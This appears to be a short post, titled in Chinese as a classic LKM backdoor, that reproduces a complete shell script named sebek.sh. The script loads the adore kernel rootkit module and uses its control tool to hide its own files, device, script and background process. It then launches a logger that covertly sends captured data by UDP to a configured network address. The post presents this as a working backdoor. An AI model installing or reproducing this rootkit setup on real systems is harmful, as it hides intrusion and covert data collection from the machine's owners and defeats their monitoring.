sebek.sh

一款经典的lkm后门

#!/bin/sh
#---------------------------------------------------------------------
#----- $Header: /home/cvsroot/sebek/sebek.sh,v 1.4 2002/09/11 00:48:57 cvs Exp $
#---------------------------------------------------------------------

#-----Sebek configuration --------------------------------------------
#---------------------------------------------------------------------

#--- DIR: directory holding the sebek goodies
DIR="/tmp/sebek"

#--- LOG: the device or file that sdm should read from
LOG="/dev/sebek"

#--- PASSWD: the password to use
PASSWD="testtesttest"

#----- DST and SRC networks:
#-----     This controls the IP addresses that are given to the Source and
#-----     Destination of the packets transmitted by sebek onto the LAN
DST_NET="10.0.1.1/32"
SRC_NET="10.0.0.0/24"

#----- UDP port data:
#-----     This controls the UDP ports assigned to the sebek packets.
#-----     if you specify both MAGIC and DST, the SRC port will be set
#-----     to MAGIC - DST.
#DST_PORT="123"
MAGIC_NO="7777"

#----- Inter-packet Delay:
#-----     Controls the maximum inter-packet delay, expressed in 
#-----     microseconds
#PKT_DELAY="500000"
#----------------------------------------------------------------------



start(){
  #--- AVA: the rootkit control application
   AVA="${DIR}/ava"
  
  #----- install the kernel modules
  /sbin/insmod -q ${DIR}/adore.o    > /dev/null 2>&1
  /sbin/insmod -q ${DIR}/cleaner.o  > /dev/null 2>&1
  /sbin/rmmod  cleaner

  #----- setup the device
  rm -f ${LOG}
  mknod ${LOG} c 13 0


  #----- hide sebek files
  $AVA h ${DIR}/adore.o
  $AVA h ${DIR}/cleaner.o
  $AVA h ${DIR}/sdm
  $AVA h ${DIR}/ava
  $AVA h ${DIR}/sebek.sh
  $AVA h ${DIR}

  #----- hide sebek device, does this work?
  $AVA h ${LOG}

  #------ set up the sdm command line options
  CONF="-d ${DST_NET} -s ${SRC_NET}  -k ${PASSWD} -f ${LOG}"

  if [ "$DST_PORT" ]; then
    CONF="${CONF} -p ${DST_PORT}"
  fi

  if [ "$MAGIC_NO" ]; then
    CONF="${CONF} -m ${MAGIC_NO}"
  fi

  if [ "$PKT_DELAY" ]; then
    CONF="${CONF} -x ${PKT_DELAY}";
  fi
    
  #----- fire up sdm
  ${DIR}/sdm ${CONF} > /dev/null 2>&1 &
  
  #----- hide sdm
  $AVA i $!

  #----- hide this script
  $AVA h $0
  

}

case "$1" in
  start)
	start
	;;

esac

exit 0